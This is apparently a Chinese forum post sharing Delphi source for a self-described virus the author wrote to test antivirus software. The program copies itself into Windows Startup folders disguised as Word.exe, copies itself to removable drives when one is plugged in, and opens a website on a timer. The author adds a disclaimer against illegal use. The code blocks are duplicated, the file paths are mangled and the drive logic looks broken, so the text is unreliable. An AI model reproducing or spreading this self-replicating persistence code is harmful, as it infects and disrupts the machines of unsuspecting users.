這個delphi程式是去年上半年為了測試病毒和病毒程式碼庫所做的惡意程式,功能有:程式執行後,會將自己新增到系統啟動項中,如果有u盤接入,會自動copy自己到優盤上,還可以在指定時間內,在系統後臺進行某些操作,比如開啟網頁什麼的,該程式已經在去年被列為病毒了。本文只做技術交流,請勿用於非法用途,出現任何問題,本人概不負責。下面時程式碼,dephi7開發,用了一個timer控制元件:
unit Unit1;
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
Dialogs,ShellApi,StdCtrls, ExtCtrls;
Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
Dialogs,ShellApi,StdCtrls, ExtCtrls;
type
TForm1 = class(TForm)
Timer1: TTimer;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
TForm1 = class(TForm)
Timer1: TTimer;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
var
Form1: TForm1;
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.WMDeviceChange (var Msg: TMessage);
var
//myMsg : String;
m_Result,i:Integer;
str_temp:string;
buf:array [0..MAX_PATH-1] of char;
begin
Case Msg.WParam of
32768:
begin
//myMsg :=`U盤插入`;
//Label1.Caption:=myMsg;
m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
for i:=0 to (m_Result div 4) do
begin
str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
if getdrivetype(pchar(str_temp)) = DRIVE_CDROM then
begin
if str_temp =`E:` then
CopyFile(Pchar(Application.ExeName),Pchar(`F:Word.exe`),False);
if str_temp =`F:` then
CopyFile(Pchar(Application.ExeName),Pchar(`G:Word.exe`),False);
if str_temp =`G:` then
CopyFile(Pchar(Application.ExeName),Pchar(`H:Word.exe`),False);
if str_temp =`H:` then
CopyFile(Pchar(Application.ExeName),Pchar(`I:Word.exe`),False);
end;
end;
end;
32772:
begin
//myMsg :=`U盤拔出`;
//Label1.Caption:=myMsg;
end;
end;
end;
var
//myMsg : String;
m_Result,i:Integer;
str_temp:string;
buf:array [0..MAX_PATH-1] of char;
begin
Case Msg.WParam of
32768:
begin
//myMsg :=`U盤插入`;
//Label1.Caption:=myMsg;
m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
for i:=0 to (m_Result div 4) do
begin
str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
if getdrivetype(pchar(str_temp)) = DRIVE_CDROM then
begin
if str_temp =`E:` then
CopyFile(Pchar(Application.ExeName),Pchar(`F:Word.exe`),False);
if str_temp =`F:` then
CopyFile(Pchar(Application.ExeName),Pchar(`G:Word.exe`),False);
if str_temp =`G:` then
CopyFile(Pchar(Application.ExeName),Pchar(`H:Word.exe`),False);
if str_temp =`H:` then
CopyFile(Pchar(Application.ExeName),Pchar(`I:Word.exe`),False);
end;
end;
end;
32772:
begin
//myMsg :=`U盤拔出`;
//Label1.Caption:=myMsg;
end;
end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
if fileexists(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`) and fileexists(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`)then
else
CopyFile(Pchar(Application.ExeName),Pchar(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`),False);
//FileSetAttr(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`,FILE_ATTRIBUTE_HIDDEN);
CopyFile(Pchar(Application.ExeName),Pchar(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`),False);
//FileSetAttr(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`,FILE_ATTRIBUTE_HIDDEN);
end;
begin
if fileexists(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`) and fileexists(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`)then
else
CopyFile(Pchar(Application.ExeName),Pchar(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`),False);
//FileSetAttr(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`,FILE_ATTRIBUTE_HIDDEN);
CopyFile(Pchar(Application.ExeName),Pchar(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`),False);
//FileSetAttr(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`,FILE_ATTRIBUTE_HIDDEN);
end;
procedure TForm1.Timer1Timer(Sender: TObject);
var
var
strurl:string;
begin
StrUrl:=`http://www.cnking.org`;
ShellExecute(0,`open`,pchar(StrUrl),nil,nil,SW_SHOW);
end;
end.